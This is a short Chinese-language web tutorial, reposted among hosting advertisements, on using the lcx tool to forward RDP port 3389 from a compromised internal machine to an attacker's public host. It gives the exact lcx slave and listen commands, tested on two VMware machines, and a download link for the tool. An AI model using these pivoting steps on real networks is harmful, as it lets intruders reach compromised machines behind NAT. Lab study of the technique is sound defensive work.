內網中的主機一般都是使用私有IP，在網絡出口處經過NAT轉換為公網IP之后，才能訪問Internet。在這種網絡結構下，通信雙方之間實現的是單向訪問，即只有內網中的主機可以主動訪問Internet中的主機，反之則不行。如果在內網中架設了一臺服務器，又需要允許Internet中的用戶訪問這臺服務器，那么就必須在網絡出口處進行端口映射。
在網絡***中，如果捕獲了一臺位于內網中的肉雞，那么***是無法主動去連接這臺肉雞的，而且也不可能在人家的網絡出口做端口映射，這時就可以用到lcx這個小工具了。下載地址：http://down.51cto.com/data/1878979

網站建設哪家好，找創新互聯！專注于網頁設計、網站建設、微信開發、小程序開發、集團企業網站建設等服務項目。為回饋新老客戶創新互聯還提供了北辰免費建站歡迎大家使用！

Lcx可以實現端口轉發，將肉雞A上的某個端口（如3389）轉發到具有公網地址的主機B上，這樣***只需連接主機B的3389端口就相當于連接到了肉雞A上，從而突破了內網私有IP的限制。
下面在vmware中利用2臺虛擬機來模擬操作，一臺虛擬機作為***主機（IP地址192.168.80.128），另一臺虛擬機作為肉雞（IP地址192.168.80.129）。
首先將lcx分別放到這兩臺虛擬機的C盤根目錄下，首先在肉雞上執行命令“lcx –slave 192.168.80.128 5000 192.168.80.129 3389”，也就是將192.168.80.129上的3389端口轉發到192.168.80.128上的5000端口。
然后再到***主機上執行命令“lcx –listen 5000 3389”，也就是在5000端口上監聽，并將收到的數據轉發到自己的3389端口上。此時在***主機上執行“netstat –an”命令，可以看到同時開放了5000和3389兩個端口。
最后在***主機上打開mstsc，只需輸入自己的IP地址（192.168.80.128或是127.0.0.1）便可以連接到肉雞上了，從而實現內網突破。

另外有需要云服務器可以了解下創新互聯scvps.cn，海內外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業上云的綜合解決方案，具有“安全穩定、簡單易用、服務可用性高、性價比高”等特點與優勢，專為企業上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

標題名稱：網絡安全系列之二lcx端口轉發實現內網突破-創新互聯
本文URL：http://vcdvsql.cn/article44/diddhe.html

成都網站建設公司_創新互聯，為您提供網站策劃、App設計、小程序開發、品牌網站建設、微信小程序、手機網站建設

廣告

聲明：本網站發布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創新互聯